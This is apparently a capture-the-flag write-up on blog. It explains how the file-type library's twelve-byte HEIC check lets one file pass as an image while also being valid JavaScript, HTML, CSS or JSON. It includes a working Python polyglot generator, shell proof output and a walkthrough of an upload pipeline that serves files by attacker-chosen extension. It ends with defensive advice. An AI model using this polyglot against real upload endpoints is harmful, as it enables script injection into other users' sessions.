All posts

The Usual Suspect: Type Confusion in Twelve Bytes

A file-upload image check that reads only twelve bytes lets you forge one buffer that is image/heic to every server-side sniff and, at the same time, a valid JavaScript, HTML, CSS, or JSON payload to whatever consumes it.

Want to work it out yourself before reading on? The challenge is live at pwnbox.io/challenges/usual-suspect , go solve it first, then come back for the breakdown.

A while back I wrote about libmagic inconsistencies that lead to type confusion , the idea that the program guessing a file's type and the program consuming it rarely agree, and that the gap between them is where bugs live.

This post is the same idea wearing different clothes. The suspect this time is file-type , the de-facto "what is this buffer?" library for Node, and the contraband is a file that is simultaneously a valid HEIC image and a valid text payload of your choosing: JavaScript, HTML, CSS, even JSON. The image half is fixed; the other half is whatever the consuming endpoint will execute or trust, in the challenge it ends up as a service worker, but that's just one door of several.

I found the primitive while building a challenge (Usual Suspect) around it. We'll build the polyglot, then watch a single upload pipeline disagree with itself about what it's holding.

Why a server trusts twelve bytes

ISO Base Media File Format (the container under MP4, MOV, HEIC, AVIF, …) is a sequence of boxes. Every box begins with a 4-byte size, a 4-byte type, and then its payload:

Anatomy of an ISO-BMFF ftyp box, a 4-byte size field (00 00 00 18), the 'ftyp' type, then the payload; only the type is checked, the size is ignored

A well-formed HEIC starts with an ftyp box whose major brand (heic) sits at bytes 8-11. The size field at the very front, here 00 00 00 18, is the part to remember: a real parser uses it, the sniffer throws it away.

Here is the entire detection routine from file-type's core.js (16.5.4):

// File Type Box (ISO base media file format)
if (
    checkString('ftyp', {offset: 4}) &&
    (buffer[8] & 0x60) !== 0x00 // Brand major, first character ASCII?
) {
    const brandMajor = buffer.toString('binary', 8, 12).replace('\0', ' ').trim();
    switch (brandMajor) {
        case 'avif':              return {ext: 'avif', mime: 'image/avif'};
        case 'mif1':              return {ext: 'heic', mime: 'image/heif'};
        case 'heic': case 'heix': return {ext: 'heic', mime: 'image/heic'};
        // ...
    }
}

Read it closely and notice what is not there:

That last point is the whole vulnerability. In a real parser the size field tells you how long the box is; here it is dead weight. And dead weight in a header is exactly what a polyglot wants: four attacker-controlled bytes sitting before the magic, with no constraints on them at all.

file-type's decision covers only the first 12 bytes of the file, everything after that point is attacker-controlled

Turning the box size into a comment

JavaScript block comments open with /* and close with */. If the first two bytes of the file are /*, then every byte after that, including ftyp, including the brand, including any binary garbage , is inside a comment until the parser sees */. So the recipe is to overwrite the unused size field with /*, leave ftyp and the brand where the sniffer expects them, then close the comment and write code:

Byte map of the polyglot, bytes 0-3 '/*--' (the unchecked size field) open a JS comment, bytes 4-7 'ftyp' and 8-11 'heic' satisfy file-type's 12-byte check, then '*/' closes the comment and your JavaScript follows

Laid out as text, the start of the file literally reads:

/*--ftypheic....heicmif1*/
globalThis.__pwned = 'it ran';
// ... rest of your script ...

The only rule for the bytes between offset 12 and the closing */ is "don't accidentally contain */." Since file-type reads nothing past byte 11, we don't need a renderable image at all, we just need those twelve bytes correct and the comment cleanly closed.

And /* is only the JavaScript (and CSS) flavour. The four free bytes adapt to whatever grammar the consuming endpoint speaks: you just need some way to neutralize the twelve fixed bytes near the front, then append your real payload.

Target format First bytes (0-3) How ftyp…heic is hidden Closes with
JavaScript / CSS /* + filler a block comment */
HTML <!-- an HTML comment -->
JSON " + filler a single string value "

(JSON strings can't hold raw NUL bytes or unescaped quotes, so for that variant keep the brand's "minor version" bytes printable instead of \x00.) Same twelve image bytes, a different host language each time, and, as we'll see, the language the application picks for you is what decides which sink you land in.

Generator

#!/usr/bin/env python3
"""Generate a HEIC / JavaScript polyglot.

file-type (16.5.4) inspects only 12 bytes of an ISO-BMFF header:
  - bytes 4..7  must be the literal b"ftyp"
  - byte  8     must satisfy (b & 0x60) != 0  ("printable-ish")
  - bytes 8..11 are the brand major -> b"heic" maps to image/heic
The 4-byte box-size field (bytes 0..3) is NEVER validated, so we
overwrite it with b"/*" to open a JavaScript block comment.
"""

def make_polyglot(js: bytes, brand: bytes = b"heic") -> bytes:
    assert len(brand) == 4
    # bytes 0-3: "/*" + filler  -> opens the JS comment (the unused "box size")
    # bytes 4-7: ftyp           -> required by file-type at offset 4
    # bytes 8-11: brand         -> "heic" -> image/heic
    head = b"/*--" + b"ftyp" + brand + b"\x00\x00\x00\x00" + brand + b"mif1"
    assert b"*/" not in head            # don't close the comment early
    return head + b"*/\n" + js          # close comment, then real JavaScript

if __name__ == "__main__":
    js = b"globalThis.__pwned = 'it ran';\n"
    import sys
    sys.stdout.buffer.write(make_polyglot(js))

And the proof that both faces are real, one buffer, two truths:

$ python3 gen.py > poly.heic.js

$ node -e "require('file-type').fromBuffer(require('fs').readFileSync('poly.heic.js')).then(d=>console.log(d))"
{ ext: 'heic', mime: 'image/heic' }      # the server sees an image

$ node --check poly.heic.js && echo OK
OK                                        # the browser sees valid JS

The first 32 bytes, for the record:

b'/*--ftypheic\x00\x00\x00\x00heicmif1*/\ngloba'

Why this matters: the two-faced upload

A single detector being shallow is a curiosity. It becomes a vulnerability when an application makes one decision based on the sniff and a different decision based on something else, exactly the type-confusion pattern from the libmagic post.

The Usual Suspect challenge is a chat app with an attachment pipeline. Watch a file pass through three different "what type are you?" checkpoints and lie at each one.

One upload, two identities, the same bytes read as image/heic to the server and as application/javascript to the browser

1. The S3-style upload gate (presigned POST policy):

['starts-with', '$Content-Type', 'image/'],

The upload is rejected unless the client-declared Content-Type starts with image/. We just say image/heic. The bytes are never inspected , this gate trusts a form field.

2. The server-side "is it really an image?" check (register.js):

const detected = await FileType.fromBuffer(buf);
if (!detected || !detected.mime || !detected.mime.startsWith('image/')) {
  return res.status(415).json({ error: 'unsupported file' });
}

This one is meant to be the honest check, it ignores the client's claim and sniffs the actual bytes. And it does sniff them… all twelve of them. Our polyglot returns image/heic. Pass.

3. The download gate (attachments.js), and here is the punchline:

// public Content-Type comes from the URL's extension (the file's
// public face). Internal storage Content-Type is ignored.
res.setHeader('Content-Type', contentTypeFromName(filename));

When the file is served back out, the response Content-Type is derived from the filename's extension, not from the bytes and not from what was stored. The registration step builds the public name from the user-supplied filename's extension:

const ext = safeExt(filename);          // attacker controls this
const publicName = `${hash}.${ext}`;    // -> "<hash>.js"

So we register the attachment with a filename ending in .js. The same bytes that were "an image" at the gate are now served with:

HTTP/1.1 200 OK
Content-Type: application/javascript

Three checkpoints, three different notions of the file's type , the form field, the magic bytes, and the extension , and the file satisfies all of them while being, in reality, executable script. That is the type confusion. The polyglot is what lets one artifact answer all three questions at once.

We picked .js here, but that extension map also hands out .html, .json, .css, and .svg. Because the served Content-Type follows the extension we choose at registration time, the exact same polyglot bytes can be served as a script, a "trusted" JSON response, an HTML page, or a stylesheet , each one a different downstream sink. Which door you actually walk through is just a matter of which extension you register; in the Usual Suspect challenge it's .js plus a client-side path traversal that turns the upload into a service worker running in the admin's session. The mechanics of that last step are left as an exercise.

The image detector did its job perfectly. It just answered a question, "are these twelve bytes an image?" , that was never the question that mattered.

The pattern, restated

Both this and the libmagic write-up are instances of the same anti-pattern:

A "type" is not a property of a file. It is an opinion held by a specific piece of code that looked at a specific slice of bytes. Two pieces of code, two slices, two opinions, and a polyglot is the file engineered to make every opinion come out "safe."

file-type is fast and convenient precisely because it reads as little as possible. For HEIC that's twelve bytes with a four-byte hole in front of them. If your security boundary is "this upload is an image," a passing sniff is necessary but nowhere near sufficient, re-encode the image, or at minimum make the content type you serve a function of the bytes you verified, not of a filename or a form field the attacker also controls.

A few practical notes

References